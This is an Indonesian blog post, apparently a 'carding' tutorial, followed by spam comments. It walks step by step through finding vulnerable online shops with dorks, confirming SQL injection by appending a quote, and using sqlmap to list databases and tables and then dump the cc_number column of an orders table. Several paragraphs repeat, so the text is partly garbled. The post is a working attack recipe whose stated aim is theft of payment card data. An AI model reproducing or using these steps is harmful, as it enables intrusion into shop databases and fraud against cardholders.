Alat-alat yang dibutuhkan:
1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart --tables
Nah, saya dapat tables nya.
Kita pilih di bagian "orders". Kita ambil columns nya, masukan perintah:
root@anonym:~# sqlmap.py -u link -D namadatabase -T namatable -C namakolom --dump
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders -C cc_number --dump
Maka nanti cc number akan muncul walau proses agak lama.
1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :
Pertama ,ambil dork lalu scan menggunakan sqli scanner
Setelah itu kita test URL target dengan memberi kan tanda petik di belakang URL
http://www.zite.com/merchandise/index.php?cat=268
menjadi :
http://www.zite.com/merchandise/index.php?cat=268'
menjadi :
http://www.zite.com/merchandise/index.php?cat=268'
Nah, web tersebut error saat kita inject.
Kedua, kita eksekusi menggunakan sqlmap dengan perintah:
root@anonym:~# sqlmap -u http://www.target.com --dbs
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 --dbs
Kedua, kita eksekusi menggunakan sqlmap dengan perintah:
root@anonym:~# sqlmap -u http://www.target.com --dbs
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 --dbs
Disini kita mendapatkan 3 database :
root@anonym:~# sqlmap -u http://www.target.com -D namadatabase --tables (disini saya coba database "balboast_gkgcart")
[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema
Setelah itu kita dump database nya untuk mencari table, dengan perintah:
Setelah itu kita dump database nya untuk mencari table, dengan perintah:
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart --tables
Nah, saya dapat tables nya.
Kita pilih di bagian "orders". Kita ambil columns nya, masukan perintah:
root@anonym:~# sqlmap.py -u http://www.target.com -D namadatabase -T namatable --columns
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders --columns
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders --columns
Maka akan muncul database orders.
Nah, sudah muncul. Tinggal kita dump 1 per 1 columnsnya bro :)
Masukkan perintah:root@anonym:~# sqlmap.py -u link -D namadatabase -T namatable -C namakolom --dump
Contoh: sqlmap -u http://www.zite.com/merchandise/index.php?cat=268 -D balboast_gkgcart -T orders -C cc_number --dump
Maka nanti cc number akan muncul walau proses agak lama.
thanks yout tutorial :D
ReplyDeleteFree APK premium | Download APK Gratis
Tutorial Carding With Sql Injection (Sqli) >>>>> Download Now
ReplyDelete>>>>> Download Full
Tutorial Carding With Sql Injection (Sqli) >>>>> Download LINK
>>>>> Download Now
Tutorial Carding With Sql Injection (Sqli) >>>>> Download Full
>>>>> Download LINK I0